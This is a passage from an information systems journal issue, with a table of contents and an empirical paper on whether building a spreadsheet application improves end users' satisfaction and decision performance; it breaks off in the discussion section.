{"Source-Url": "https://downloads.mysql.com/docs/visual-studio-en.pdf", "len_cl100k_base": 14470, "olmocr-version": "0.1.53", "pdf-total-pages": 88, "total-fallback-pages": 0, "total-input-tokens": 136126, "total-output-tokens": 18176, "length": "2e13", "weborganizer": {"__label__adult": 0.0002582073211669922, "__label__art_design": 0.0003502368927001953, "__label__crime_law": 0.0001424551010131836, "__label__education_jobs": 0.0006866455078125, "__label__entertainment": 6.145238876342773e-05, "__label__fashion_beauty": 9.41753387451172e-05, "__label__finance_business": 0.00013458728790283203, "__label__food_dining": 0.00014221668243408203, "__label__games": 0.0006670951843261719, "__label__hardware": 0.0004267692565917969, "__label__health": 0.00010865926742553712, "__label__history": 0.0001373291015625, "__label__home_hobbies": 6.377696990966797e-05, "__label__industrial": 0.00013554096221923828, "__label__literature": 0.00014901161193847656, "__label__politics": 0.0001049041748046875, "__label__religion": 0.0002713203430175781, "__label__science_tech": 0.0011234283447265625, "__label__social_life": 6.449222564697266e-05, "__label__software": 0.03289794921875, "__label__software_dev": 0.96142578125, "__label__sports_fitness": 0.00014293193817138672, "__label__transportation": 0.00014889240264892578, "__label__travel": 0.00014722347259521484}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 70998, 0.02101]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 70998, 0.31561]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 70998, 0.78245]], "google_gemma-3-12b-it_contains_pii": [[0, 24, false], [24, 1144, null], [1144, 5279, null], [5279, 5279, null], [5279, 9112, null], [9112, 10789, null], [10789, 13278, null], [13278, 14401, null], [14401, 14883, null], [14883, 15243, null], [15243, 15613, null], [15613, 16422, null], [16422, 17324, null], [17324, 17324, null], [17324, 19938, null], [19938, 21560, null], [21560, 22740, null], [22740, 23311, null], [23311, 25561, null], [25561, 27161, null], [27161, 27590, null], [27590, 27590, null], [27590, 28320, null], [28320, 29682, null], [29682, 31693, null], [31693, 33933, null], [33933, 34517, null], [34517, 35769, null], [35769, 36802, null], [36802, 36993, null], [36993, 37640, null], [37640, 38291, null], [38291, 39402, null], [39402, 39939, null], [39939, 40615, null], [40615, 40918, null], [40918, 42129, null], [42129, 42933, null], [42933, 43681, null], [43681, 43681, null], [43681, 44712, null], [44712, 45604, null], [45604, 46639, null], [46639, 46915, null], [46915, 47897, null], [47897, 48215, null], [48215, 48525, null], [48525, 49070, null], [49070, 49743, null], [49743, 50207, null], [50207, 51861, null], [51861, 52197, null], [52197, 52248, null], [52248, 52563, null], [52563, 52692, null], [52692, 52975, null], [52975, 53297, null], [53297, 53532, null], [53532, 54288, null], [54288, 54695, null], [54695, 55088, null], [55088, 55184, null], [55184, 55863, null], [55863, 55999, null], [55999, 56363, null], [56363, 56576, null], [56576, 56937, null], [56937, 57277, null], [57277, 57535, null], [57535, 57535, null], [57535, 58697, null], [58697, 58697, null], [58697, 59392, null], [59392, 59453, null], [59453, 60914, null], [60914, 61507, null], [61507, 62902, null], [62902, 64438, null], [64438, 64858, null], [64858, 65027, null], [65027, 65205, null], [65205, 65432, null], [65432, 66996, null], [66996, 68713, null], [68713, 70034, null], [70034, 70612, null], [70612, 70998, null], [70998, 70998, null]], "google_gemma-3-12b-it_is_public_document": [[0, 24, true], [24, 1144, null], [1144, 5279, null], [5279, 5279, null], [5279, 9112, null], [9112, 10789, null], [10789, 13278, null], [13278, 14401, null], [14401, 14883, null], [14883, 15243, null], [15243, 15613, null], [15613, 16422, null], [16422, 17324, null], [17324, 17324, null], [17324, 19938, null], [19938, 21560, null], [21560, 22740, null], [22740, 23311, null], [23311, 25561, null], [25561, 27161, null], [27161, 27590, null], [27590, 27590, null], [27590, 28320, null], [28320, 29682, null], [29682, 31693, null], [31693, 33933, null], [33933, 34517, null], [34517, 35769, null], [35769, 36802, null], [36802, 36993, null], [36993, 37640, null], [37640, 38291, null], [38291, 39402, null], [39402, 39939, null], [39939, 40615, null], [40615, 40918, null], [40918, 42129, null], [42129, 42933, null], [42933, 43681, null], [43681, 43681, null], [43681, 44712, null], [44712, 45604, null], [45604, 46639, null], [46639, 46915, null], [46915, 47897, null], [47897, 48215, null], [48215, 48525, null], [48525, 49070, null], [49070, 49743, null], [49743, 50207, null], [50207, 51861, null], [51861, 52197, null], [52197, 52248, null], [52248, 52563, null], [52563, 52692, null], [52692, 52975, null], [52975, 53297, null], [53297, 53532, null], [53532, 54288, null], [54288, 54695, null], [54695, 55088, null], [55088, 55184, null], [55184, 55863, null], [55863, 55999, null], [55999, 56363, null], [56363, 56576, null], [56576, 56937, null], [56937, 57277, null], [57277, 57535, null], [57535, 57535, null], [57535, 58697, null], [58697, 58697, null], [58697, 59392, null], [59392, 59453, null], [59453, 60914, null], [60914, 61507, null], [61507, 62902, null], [62902, 64438, null], [64438, 64858, null], [64858, 65027, null], [65027, 65205, null], [65205, 65432, null], [65432, 66996, null], [66996, 68713, null], [68713, 70034, null], [70034, 70612, null], [70612, 70998, null], [70998, 70998, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 70998, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 70998, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 70998, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 70998, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 70998, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 70998, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 70998, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 70998, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 70998, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 70998, null]], "pdf_page_numbers": [[0, 24, 1], [24, 1144, 2], [1144, 5279, 3], [5279, 5279, 4], [5279, 9112, 5], [9112, 10789, 6], [10789, 13278, 7], [13278, 14401, 8], [14401, 14883, 9], [14883, 15243, 10], [15243, 15613, 11], [15613, 16422, 12], [16422, 17324, 13], [17324, 17324, 14], [17324, 19938, 15], [19938, 21560, 16], [21560, 22740, 17], [22740, 23311, 18], [23311, 25561, 19], [25561, 27161, 20], [27161, 27590, 21], [27590, 27590, 22], [27590, 28320, 23], [28320, 29682, 24], [29682, 31693, 25], [31693, 33933, 26], [33933, 34517, 27], [34517, 35769, 28], [35769, 36802, 29], [36802, 36993, 30], [36993, 37640, 31], [37640, 38291, 32], [38291, 39402, 33], [39402, 39939, 34], [39939, 40615, 35], [40615, 40918, 36], [40918, 42129, 37], [42129, 42933, 38], [42933, 43681, 39], [43681, 43681, 40], [43681, 44712, 41], [44712, 45604, 42], [45604, 46639, 43], [46639, 46915, 44], [46915, 47897, 45], [47897, 48215, 46], [48215, 48525, 47], [48525, 49070, 48], [49070, 49743, 49], [49743, 50207, 50], [50207, 51861, 51], [51861, 52197, 52], [52197, 52248, 53], [52248, 52563, 54], [52563, 52692, 55], [52692, 52975, 56], [52975, 53297, 57], [53297, 53532, 58], [53532, 54288, 59], [54288, 54695, 60], [54695, 55088, 61], [55088, 55184, 62], [55184, 55863, 63], [55863, 55999, 64], [55999, 56363, 65], [56363, 56576, 66], [56576, 56937, 67], [56937, 57277, 68], [57277, 57535, 69], [57535, 57535, 70], [57535, 58697, 71], [58697, 58697, 72], [58697, 59392, 73], [59392, 59453, 74], [59453, 60914, 75], [60914, 61507, 76], [61507, 62902, 77], [62902, 64438, 78], [64438, 64858, 79], [64858, 65027, 80], [65027, 65205, 81], [65205, 65432, 82], [65432, 66996, 83], [66996, 68713, 84], [68713, 70034, 85], [70034, 70612, 86], [70612, 70998, 87], [70998, 70998, 88]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 70998, 0.02665]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
e3159b3353e0812b09d5b4f38ad46bcda96095e6
|
Editorial Preface
Journal Receives New Name and Expanded Focus
Editor-in-Chief M. Adam Mahmood, University of Texas at El Paso, USA
This preface presents an introduction to the new name and focus of the journal.
RESEARCH PAPERS
Success Factors in the Implementation of a Collaborative Technology and Resulting Productivity Improvements in a Small Business: An Exploratory Study
Nory B. Jones, University of Maine, USA
Thomas R. Kochtanek, University of Missouri, USA
Practitioners and academics often assume that investments in technology will lead to productivity improvement. There is little evidence demonstrating specific, generalizable factors that contribute to these improvements. This qualitative study examined the relationship between four classes of potential success factors on the adoption of a collaborative technology and whether they were related to performance improvements in a small service company.
Organizational Knowledge Sharing in ERP Implementation: Lessons from Industry
Mary C. Jones, University of North Texas, USA
R. Leon Price, University of Oklahoma, USA
This study presents findings about organizational knowledge sharing during ERP implementation in three firms. Data were collected through interviews using a multi-site case study methodology.
The Effect of End User Development on End User Success
Tanya McGill, Murdoch University, Australia
This study investigates the role that developing an end user application plays in the eventual success of the application for the user developer. The results of this study suggest that the process of developing an application not only predisposes an end user developer to be more satisfied with the application than they would be if it were developed by another end user, but also leads them to perform better with it.
The Technology Acceptance Model: A Meta-Analysis of Empirical Findings
Qingxiong Ma, Southern Illinois University, USA
Liping Liu, University of Akron, USA
The technology acceptance model proposes that perceived ease of use and perceived usefulness predict the acceptance of information technology. In this study, the authors conducted a meta-analysis based on 26 selected empirical studies in order to synthesize the empirical evidence.
The Index to Back Issues is available on the WWW at http://www.idea-group.com.
The Effect of End User Development on End User Success
Tanya McGill, Murdoch University, Australia
ABSTRACT
End user development of applications forms a significant part of organizational systems development. This study investigates the role that developing an application plays in the eventual success of the application for the user developer. The results of this study suggest that the process of developing an application not only predisposes an end user developer to be more satisfied with the application than they would be if it were developed by another end user, but also leads them to perform better with it. Thus, the results of the study highlight the contribution of the process of application development to user developed application success.
Keywords: user satisfaction; measuring IS success; user development; end user computing; end users
INTRODUCTION
An end user developer is someone who develops applications systems to support his or her work and possibly the work of other end users. The applications developed are known as user developed applications (UDAs). So, while the technical abilities of user developers may vary considerably, they are basically required to analyze, design and implement applications. End user development of applications forms a significant part of organizational systems development, with the ability to develop small applications forming part of the job requirements for many positions (Jawahar & Elango, 2001). In a survey to determine the types of applications developed by end users, Rittenberg and Senn (1990) identified over 130 different types of applications. Over half of these were accounting related, but marketing, operations and human resources applications were also heavily represented. The range of tasks for which users develop applications has expanded as the sophistication of both soft-
ware development tools and user developers has increased, and this has led to a degree of convergence with corporate computing, so that the tasks for which UDAs are developed are less distinguishable from tasks for corporate computing applications (McLean, Kappelman, & Thompson, 1993). In addition to the traditional tasks that UDAs have been developed to support, Web applications are becoming increasingly common (Nelson & Todd, 1999; Ouellette, 1999).
Much has been written in the end user computing literature about the potential benefits and risks of end user development. It has been suggested that end user development offers organizations better and more timely access to information, improved quality of information, improved decision making, reduced application development backlogs and improved information systems department/user relationships (Brancheau & Brown, 1993; Shayo, Guthrie, & Igbaria, 1999). In the early UDA literature, the proposed benefits of UDA were seen to flow mainly from a belief that the user has a superior understanding of the problem to be solved by the application (Amoroso, 1988). This superior understanding should then enable end users to identify information requirements more easily and to thus create applications that provide information of better quality. This in turn should lead to better decision making. Other proposed benefits should also flow from this: user development of applications should allow the information systems staff to focus more on the remaining, presumably larger, requests and hence to reduce the application development backlog. This, in turn, should improve relationships between information systems staff and end users.
Despite the potential benefits to an organization of user development of applications, there are many risks associated with it that may lead to potentially dysfunctional consequences for the organization’s activities. These risks result from a potential decrease in application quality and control as individuals with little information systems training take responsibility for developing and implementing systems of their own making (Cale, 1994), and include ineffective use of monetary resources, threats to data security and integrity, solving the wrong problem (Alavi & Weiss, 1985-1986), unreliable systems, incompatible systems, and use of private systems when organizational systems would be more appropriate (Brancheau & Brown, 1993).
As end user development forms a large proportion of organizational systems development, its success is of great importance to organizations. The decisions made by end users using UDAs influence organizational performance every day. Organizations carry out very little formal assessment of fitness for use of UDAs (Panko & Halverson, 1996); they therefore have to rely very heavily on the judgment of end users, both those who develop the applications and others that may use them, as end user developers are not the only users of UDAs. Bergeron and Berube (1988) found that 44% of the end user developers in their study had developed applications that were used by more than two people, and Hall (1996) found that only 17% of the spreadsheets contributed by participants in her study were solely for the developer’s own use. Therefore, it is essential that more is known about UDA success, including whether end users are disadvantaged when they use applications developed by other end users. This paper explores the contribution of the development process to UDA success, and hence highlights differences between the success of UDAs when used by the developer and when used by other end users.
The literature on user participation and involvement proposes benefits that are thought to accrue from greater inclusion of users in the system development process. The benefits that have been proposed include higher levels of information system usage, greater user acceptance of systems and increased user satisfaction (Lin & Shao, 2000). The end user’s superior knowledge of the problem to be solved is certainly one factor influencing these benefits, but the process of participating per se is also thought to have benefits. Those who have participated in systems development have a greater understanding of the functionality of the resulting application (Lin & Shao, 2000) and a greater sense of involvement with it (Barki & Hartwick, 1994), and hence a greater commitment to making it successful. User development of applications has been described as the ultimate user involvement (Cheney, Mann, & Amoroso, 1986). It could thus be expected to lead to systems that gain the benefit of a better understanding of the problem, and to end users with a better understanding of the application and greater commitment to making it work.
This study was designed to isolate the effect of actually developing a UDA on the application’s eventual success for the user developer, and to measure that success in terms of a range of possible success measures. There has been little empirical research on user development of applications (Shayo et al., 1999), and most of what has been undertaken has used user satisfaction as the measure of success because of the lack of direct measures available (Etezadi-Amoli & Farhoomand, 1996). User satisfaction refers to the attitude or response of an end user towards an information system. While user satisfaction has been the most widely reported measure of success (Gelderman, 1998), there have been concerns about its use as the major measure of information systems success (e.g., Etezadi-Amoli & Farhoomand, 1996; Galletta & Lederer, 1989; Melone, 1990; Thong & Chee-Sing, 1996).
The appropriateness of user satisfaction as a measure of system effectiveness may be even more questionable in the UDA domain. Users who assess their own computer applications may be less able to be objective than users who assess applications developed by others (McGill, Hobbs, Chan, & Khoo, 1998). The actual development of an application, which may involve a significant investment of time and creative energy, may be satisfying other needs beyond the immediate task. User satisfaction with a UDA could therefore reflect satisfaction with the (highly personal) development process as much as with the application itself.
Other proposed measures of information systems success that might be appropriate for UDAs include: system quality, information quality, involvement, use, individual impact, and organizational impact (DeLone & McLean, 1992; Seddon, 1997). System quality refers to the quality of an information system (as opposed to the quality of the information it produces). It is concerned with issues such as reliability, maintainability, ease of use, etc. As this study relates to the success of a UDA for the eventual user, the user’s perception of system quality is considered important. Information quality relates to the characteristics of the information that an information system produces. It includes issues such as timeliness, accuracy, relevance and format. As discussed above, improved information quality has been proposed as one of the major benefits of user development of applications.
Involvement is defined as “a subjective psychological state, reflecting the im-
The importance and personal relevance of a system to the user” (Barki & Hartwick, 1989, p.53). Seddon and colleagues (Seddon, 1997; Seddon & Kiew, 1996) included involvement in their extensions to DeLone and McLean’s (1992) model of information systems success. Use refers to how much an information system is used. It has been widely used as a measure of organizational information systems success (e.g., Gelderman, 1998; Kim, Suh, & Lee, 1998), but is only considered appropriate if use of a system is not mandatory (DeLone & McLean, 1992).
Individual impact refers to the effect of an information system on the behavior or performance of the user. DeLone and McLean (1992) claimed that individual impact is the most difficult information systems success category to define in unambiguous terms. For example, the individual impact of a UDA could be related to a number of measures such as impact on performance, understanding, decision making or motivation. Organizational impact refers to the effect of an information system on organizational performance. According to DeLone and McLean’s model, the impact of an information system on individual performance should have some eventual organizational impact. However, the relationship between individual impact and organizational impact is acknowledged to be complex. Organizational impact is a broad concept, and there has been a lack of consensus about what organizational effectiveness is and how it should be measured (Thong & Chee-Sing, 1996). DeLone and McLean (1992, p. 74) recognized that difficulties are involved in “isolating the effect of the I/S effort from the other effects which influence organizational performance.”. Again, this issue is likely to be magnified in the UDA domain, where system use may be very local in scope.
The fact that vital organizational decision making relies on the individual end user’s perception of fitness for use suggests that more insight is needed into the role of application development in the success of applications, and that as well as user satisfaction, additional measures of success should be considered. This paper reports on a study designed to address this need by considering a range of both perceptual and direct measures of UDA success in the same study, and isolating the role that actually developing an application plays in the eventual success of the application.
**RESEARCH QUESTIONS**
The primary research question investigated in this study was:
*Does the process of developing an application enhance the success of that application for the user developer?*
In order to isolate the effect of actually developing an application on its success for the user, this study compares end user developers using applications they have developed themselves, with end users using applications developed by another end user, on a number of key variables that have been considered in the information systems success literature. Spreadsheets are the most commonly used tool for end user development of applications (Taylor, Moynihan & Wood-Harper, 1998). Therefore, in this study a decision was made to focus on end users who develop and use spreadsheet applications.
In a study that investigated the ability of end users to assess the quality of applications they develop, McGill (2002) found significant differences between the system
quality assessments of end user developers and independent expert assessors. In particular, the results suggested that end users with little experience might erroneously consider the applications they develop to be of high quality. If this is the case, then end user developers may also consider their applications to be of higher quality than do other users. It was therefore hypothesized that:
H1: End user developers will perceive applications they have developed themselves to be of higher system quality than applications developed by another end user with a similar level of spreadsheet knowledge.
Doll and Torkzadeh (1989) found that end user developers had much higher levels of involvement with applications than did users who were involved in the development process, but where the application was primarily developed by a systems analyst or by another end user. It was therefore hypothesized that:
H2: End user developers will have higher levels of involvement with applications they have developed themselves than with applications developed by another end user with a similar level of spreadsheet knowledge.
End user developers have been found to be more satisfied with applications they have developed themselves than with applications developed by another end user (McGill et al., 1998), or with applications developed by a systems analyst (despite involvement in the systems development process) (Doll & Torkzadeh, 1989). It was therefore hypothesized that:
H3: End user developers will have higher levels of user satisfaction when using applications they have developed themselves than when using applications developed by another end user with a similar level of spreadsheet knowledge.
Increased user satisfaction has been shown to be associated with increased individual impact (Etezadi-Amoli & Farhoomand, 1996; Gatian, 1994; Gelderman, 1998; Igbaria & Tan, 1997). As end user developers are believed to be more satisfied with applications they have developed than are other users of these applications, it is to be expected that they will also perceive that these applications have a greater impact on their work. Therefore it was hypothesized that:
H4: End user developers will have higher levels of perceived individual impact when using applications they have developed themselves than when using applications developed by another end user with a similar level of spreadsheet knowledge.
As previously discussed, the end user computing literature has claimed that end user development leads to more timely access to information, improved quality of information and improved decision making (Brancheau & Brown, 1993; Shayo et al., 1999). While this may be partially due to end users having a better understanding of the problems to be solved by information systems (Amoroso, 1988), the actual process of developing an application may also lead to benefits resulting from a superior knowledge of the application. It was hence hypothesized that:
H5: End user developers will make more accurate decisions when using appli-
cations they have developed themselves, than when using applications developed by another end user with a similar level of spreadsheet knowledge.
H6: End user developers will make faster decisions when using applications they have developed themselves than when using applications developed by another end user with a similar level of spreadsheet knowledge.
METHOD
Participants
The target population for this study was end users who develop their own applications using spreadsheets. In order to obtain a sample of end user developers with a wide range of backgrounds, participants were recruited for the study in a variety of ways. It was recognized that the time required for participation (see below) would make recruitment difficult, so participants were offered a one-hour training course entitled “Developing Spreadsheet Applications” as an incentive. This session focused on spreadsheet planning, design and testing. They were also given $20 to compensate them for parking costs, petrol and inconvenience. Recruitment occurred firstly through a number of advertisements that were placed in local newspapers calling for volunteers, these were followed by e-mails to three large organizations that had expressed interest in the study and finally word of mouth brought forth some additional participants. The criteria for inclusion in the study was previous experience using Microsoft Excel. While being essentially a convenience sample, the participants covered a broad spectrum of ages, spreadsheet experience and training.
Procedure
Fourteen separate experimental sessions of approximately four hours were held over a period of five months. Each session involved between seven and 17 participants (depending on availability) and a total of 159 end users participated overall. Each experimental session consisted of four parts (see Table 1). The study used a within-subjects research design as this has been shown to provide superior control for individual subject differences (Maxwell & Delaney, 1990).
In Part 1 participants were asked to complete a questionnaire to provide demographic information about themselves and information about their background with computers and spreadsheets. The questionnaire also tested their knowledge of spreadsheets. They were not told the objective of the study.
In Part 2 the participants were given a problem statement and asked to develop a spreadsheet to solve it using Microsoft Excel. The problem related to making
Table 1: Experimental session outline
<table>
<thead>
<tr>
<th>Part</th>
<th>Activities</th>
<th>Approx. Duration</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Collect background information and assess spreadsheet knowledge</td>
<td>30 minutes</td>
</tr>
<tr>
<td>2</td>
<td>Develop spreadsheets (see Appendix 1 for the problem statement)</td>
<td>1.5 hours</td>
</tr>
<tr>
<td>3</td>
<td>Use spreadsheets to answer decision questions and complete perceived system quality, involvement, user satisfaction and perceived individual impact questions (see Appendix 2 for the questionnaire items)</td>
<td>1 hour</td>
</tr>
<tr>
<td>4</td>
<td>Training session</td>
<td>1 hour</td>
</tr>
</tbody>
</table>
choices between car rental companies (see Appendix 1 for the problem statement). Participants were provided with blank paper to use for planning if they wished, but otherwise were left to develop the application as they wished. They were encouraged to treat the development exercise as they would a task at work, rather than as a test. Participants could use on-line help or ask for technical help from the two researchers present in the laboratory during each session.
Once all participants in the session had completed their spreadsheet, they undertook Part 3 of the session. Each participant was given a floppy disk containing both the spreadsheet they had developed and a spreadsheet from another participant in the session. Matching of participants was done on the basis of the spreadsheet knowledge scores from Part 1, in the expectation that participants with a similar level of spreadsheet knowledge would develop spreadsheets of similar sophistication.
To control for presentation order effects, each participant was randomly assigned to use either their own or the other spreadsheet first. They then used the spreadsheet to answer 10 questions relating to making choices about car rental hire. The time taken to answer these questions was recorded. They then completed a questionnaire containing items to measure: perceived system quality, involvement, user satisfaction and perceived individual impact. Once the questionnaire and their answers to the car rental decision questions were collected, each participant then repeated the process with the other spreadsheet on their floppy disk. A different but equivalent set of car rental decision questions was used. Eighty of the participants ended up using the application they had developed first, and 79 participants used the other application first.
Instruments
The development of the research instruments for this study involved a review of many existing survey instruments. To ensure the reliability and validity of the measures used, previously validated measurement scales were adopted wherever possible. Factor analysis of the items used to measure the constructs that were not directly measured was undertaken to examine discriminant validity of the constructs. Discriminant validity appeared to be satisfactory for all operationalizations except for user satisfaction and perceived individual impact, which were highly correlated (r = 0.95, p < 0.000). However, as these instruments were used in a closely related study on end user success (McGill, Hobbs, & Klobas, 2003) and discriminant validity demonstrated for that study, a decision was made to accept these operationalizations.
Spreadsheet Application Development Knowledge
Spreadsheet application development knowledge relates to the knowledge that end user developers make use of when developing UDAs. The instrument used to measure spreadsheet development knowledge was based upon an instrument used by McGill and Dixon (2001). That instrument was developed using material from several sources including: Kreie’s (1998) instrument to measure spreadsheet features knowledge; spreadsheet development methodologies from Ronen, Palley and Lucas (1989) and Salchenberger (1993); and Rivard et al.’s (1997) instrument to measure the quality of UDAs. The final instrument contained 25 items. Each item was presented as a multiple choice question with five options. In each case the fifth option was ‘I don’t know’ or ‘I am not fa-
miliar with this feature’. Nine of the items related to knowledge about the features and functionality of spreadsheet packages, eight items related to development process and eight items related to spreadsheet quality assurance. The instrument was shown to be reliable with a Cronbach’s alpha of 0.78 (Nunnally, 1978).
**Involvement**
The involvement construct was operationalized using Barki and Hartwick’s (1991) instrument. They developed the scale for information systems based on the general involvement scale proposed by Zaichkowsky (1985). The resulting scale is a seven point bi-polar semantic differential scale with 11 items. See Appendix 2 for a list of the questionnaire items used to measure involvement.
The instrument, as used in this study, was shown to be reliable with a Cronbach’s alpha of 0.95 and involvement was created as a composite variable using the factor weights obtained from measurement model development using AMOS 3.6.
**Perceived System Quality**
The items used to measure perceived system quality were obtained from the instrument developed by Rivard et al (1997) to assess the quality of UDAs. Rivard et al.’s instrument was designed to be suitable for end user developers to complete, yet to be sufficiently deep to capture their perceptions of components of quality. For this study, items that were not appropriate for the applications under consideration (e.g. specific to database applications) were excluded. Minor adaptations to wording were also made to reflect the environment in which application development and use occurred. The resulting perceived system quality scale consisted of 20 items, each scored on a Likert scale of 1 to 7 where (1) was labeled ‘strongly agree’ and (7) was labeled ‘strongly disagree’. See Appendix 2 for a list of the questionnaire items used to measure perceived system quality.
The instrument was shown to be reliable with a Cronbach’s alpha of 0.94 and perceived system quality was created as a composite variable using the factor weights obtained from measurement model development using AMOS 3.6.
**User Satisfaction**
Given the confounding of user satisfaction with information quality and system quality in some previous studies (Seddon & Kiew, 1996), items measuring only user satisfaction were sought. Seddon and Yip’s (1992) four-item seven-point semantic differential scale that attempts to measure user satisfaction directly was used in this study. A typical item on this scale is ‘How effective is the system?’, measured from (1) ‘effective’ to (7) ‘ineffective’. See Appendix 2 for a list of the questionnaire items used to measure user satisfaction.
The instrument was shown to be reliable with a Cronbach’s alpha of 0.96 and user satisfaction was created as a composite variable using the factor weights obtained from a one factor congeneric measurement model developed using AMOS 3.6.
**Individual Impact**
In this study, it was explicitly recognized that an individual’s perception of the impact of an information system on their performance might not be consistent with other direct measures of individual impact, and hence three measures of individual impact were included in the study. These were individual impact as perceived by the end user, accuracy of decision making, and time taken to answer a set of questions.
Perceived individual impact was mea-
sured using items derived from Goodhue and Thompson (1995) in their study on user evaluations of systems as surrogates for objective performance. The instrument was shown to be reliable with a Cronbach’s alpha of 0.96. See Appendix 2 for a list of the questionnaire items used to measure perceived individual impact.
In addition to the end user’s perception of individual impact, two direct, easily quantifiable, aspects of individual impact were also measured. These were decision accuracy and time taken to answer a set of questions, and were also used by Goodhue, Klein and March (2000) in their study on user evaluations of systems.
Two sets of 10 different but equivalent questions involving the comparison of costs of car rental companies under a variety of scenarios were created. The questions ranged from comparison of the three firms when no excess kilometer charges are imposed through to questions where excesses are applied and basic parameters are assumed to have changed from those given in the original problem description. A typical question is “Which rental company is the cheapest if you wish to hire a car for 6 days and drive approximately 1,500 kilometers with it?” Participants were asked to provide both the name of the cheapest firm and its cost. The questions were piloted by four end users and slight changes made to clarify them. The equivalence of the two sets of questions in terms of difficulty and time to complete was also confirmed by measuring the time taken to answer each set using the four applications created during piloting of the task.
RESULTS
Of the 159 participants, 32.7% were male and 67.3% were female (52 males, 107 females). Their ages ranged from 14 to 77 with an average age of 42.7. Participants reported an average of 4.5 years experience using spreadsheets (with a range from 0 to 21 years). One hundred and twelve (70.4%) reported using spreadsheets at work and 92 (57.9%) reported using spreadsheets for personal use.
Table 2 provides descriptive information about each of the variables of interest. Data analysis was undertaken using MANOVA. Pillai’s Trace ($F = 5.45; df = 6, 306; p < 0.000$) indicated that there was a significant multivariate effect for being the developer. Each of the hypotheses was then addressed using univariate F-tests (see Table 2). As a number of comparisons were being made, the level of significance
<table>
<thead>
<tr>
<th>Developer + User</th>
<th>User Only</th>
<th>Comparison</th>
</tr>
</thead>
<tbody>
<tr>
<td>Perceived system quality</td>
<td>Mean 4.64 Std. dev 1.27 N 157</td>
<td>Mean 3.98 Std. dev 1.48 N 156</td>
</tr>
<tr>
<td>Involvement</td>
<td>Mean 9.36 Std. dev 2.73 N 157</td>
<td>Mean 8.17 Std. dev 3.20 N 156</td>
</tr>
<tr>
<td>User satisfaction</td>
<td>Mean 4.44 Std. dev 1.86 N 157</td>
<td>Mean 3.63 Std. dev 2.07 N 156</td>
</tr>
<tr>
<td>Perceived individual impact</td>
<td>Mean 9.38 Std. dev 3.94 N 157</td>
<td>Mean 7.26 Std. dev 4.30 N 156</td>
</tr>
<tr>
<td>Number of decisions correct (/10)</td>
<td>Mean 4.43 Std. dev 3.33 N 157</td>
<td>Mean 3.47 Std. dev 3.22 N 156</td>
</tr>
<tr>
<td>Time to make decisions (minutes)</td>
<td>Mean 17.75 Std. dev 10.00 N 157</td>
<td>Mean 15.31 Std. dev 7.22 N 156</td>
</tr>
</tbody>
</table>
Table 2: End user developer perceptions and performance when using their own or another application
was conservatively set at 0.01.
End users perceived applications they had developed themselves to be of higher quality than applications developed by other end users. On average, there was a 16.6% difference in perceived quality when the developer was assessing his/her own application. This increase was significant ($F = 17.96; \text{df} = 1, 311; p < 0.001$). End user developers were also significantly more involved with their own applications ($F = 12.42; \text{df} = 1, 311; p < 0.001$) and significantly more satisfied with them ($F = 13.22; \text{df} = 1, 311; p < 0.001$). The average difference in involvement if the user was also the developer was 14.6% and the average difference in user satisfaction was 22.3%. Thus, Hypotheses 1 to 3 were supported.
End users perceived applications they had developed themselves as having a significantly greater impact on their decision performance ($F = 20.65; \text{df} = 1, 311; p < 0.001$), and this was confirmed as they made a significantly larger number of correct decisions ($F = 6.70; \text{df} = 1, 311; p = 0.010$). The average difference in perceived individual impact of the application was 29.2% and the average difference in the number of decisions correct was 27.7%. Thus, Hypotheses 4 and 5 were supported. It was also hypothesized that end user developers would make faster decisions when using the application they had developed themselves. However, this hypothesis was not supported. End users took longer on average to answer the questions using their application ($F = 6.10; \text{df} = 1, 311; p = 0.014$). On average, the difference in decision time was 15.8%.
**DISCUSSION**
The results of this study suggest that the process of developing an application not only predisposes an end user developer to be more satisfied with the application than they would be if it were developed by another end user, but also leads them to perform better with the application than they would if it were developed by another end user. While previous research has established the positive impact of the process of end user development on subjective measures such as involvement (Doll & Torkzadeh, 1989) and user satisfaction (Doll & Torkzadeh, 1989; McGill et al., 1998), its impact on directly measured performance has not previously been established. The results of this study highlight the contribution of the process of application development to application success. This contribution appears to be beyond the advantages achieved by an increased knowledge of the problem situation, as in this study the effects of domain knowledge were controlled for by the within-subjects design. Thus, end user developers benefit not only from better understanding of the problem to be solved (Amoroso, 1988), but also from the process of application development.
The end user developers in this study had significantly higher levels of involvement, user satisfaction and perceived individual impact when using applications they had developed themselves than they did when using applications developed by another end user with approximately the same levels of spreadsheet development knowledge. They also perceived their applications to be of higher system quality. These results are consistent with the results in the literature on user involvement in the development of organizational systems. For example, Doll and Torkzadeh (1988) found user participation in design to be positively correlated with end user computing satisfaction, and Lawrence and Low (1993) found that the more a user felt involved with the development process, the more satisfied they were with the system. The
